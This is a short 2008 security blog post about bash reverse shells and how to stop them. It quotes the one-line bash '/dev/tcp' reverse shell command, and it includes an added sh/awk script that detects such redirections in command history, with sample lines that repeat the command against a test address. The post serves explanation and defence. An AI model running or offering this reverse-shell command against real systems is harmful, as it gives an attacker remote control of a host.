by kriggins on April 21, 2008
in Tips
In this post, I referenced a very interesting article over at Neohapsis about easily setting up a reverse shell using just the bash shell. Well, there is a new post up which talks about the flip side of the equation: how to stop reverse shells.
Like the first post, this one is also a good read.
Neohapsis just created a lot of pain for those who are trying to stop folks who are able to execute arbitrary code on a host, but unable to get a reverse shell. It used to be that you could remove netcat, wget, ftp, etc. and make it much more difficult for a reverse shell to be started. Enter the ever friendly and helpful Bash shell.
All you need is:
$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
and tadaa, reverse shell.
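Since the whole point of the follow-up is stopping this, here is a small detection example I added myself (it is not from this post or from Neohapsis): a POSIX sh/awk scanner that flags command lines using bash's /dev/tcp or /dev/udp redirection and pulls out the host and port. It assumes one command line per input line (shell history, or command lines exported from an audit log) and runs over a few constructed sample lines.

```sh
#!/bin/sh
# Added example, not from the original post or Neohapsis.
# Reads command lines from stdin (one per line) and prints, for every
# occurrence of bash's network redirection path, a line of the form:
#   proto host port <TAB> original command line
scan_net_redirects() {
    awk '
    BEGIN {
        # /dev/tcp/HOST/PORT or /dev/udp/HOST/PORT; HOST may be a name or an IP.
        re = "/dev/(tcp|udp)/[^/ \t]+/[0-9]+"
    }
    {
        line = $0
        # A single command line may carry several redirections; report each.
        while (match(line, re)) {
            hit = substr(line, RSTART, RLENGTH)
            n = split(hit, parts, "/")
            # parts: "" dev proto host port
            printf "%s %s %s\t%s\n", parts[3], parts[4], parts[5], $0
            line = substr(line, RSTART + RLENGTH)
        }
    }'
}

# Constructed sample input (TEST-NET addresses, not real hosts).
SAMPLE_LINES='exec /bin/sh 0</dev/tcp/203.0.113.10/4444 1>&0 2>&0
ls -la /tmp
cat < /dev/udp/198.51.100.7/53
echo hello > /tmp/devtcp.txt'

# Stand-alone run: prints the two hits, the other lines stay silent.
printf '%s\n' "$SAMPLE_LINES" | scan_net_redirects
```

The same function can be pointed at a real history file with `scan_net_redirects < ~/.bash_history`; a match is a strong signal worth an alert, since legitimate use of this redirection is rare.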
Go check it out - http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/
Kevin Riggins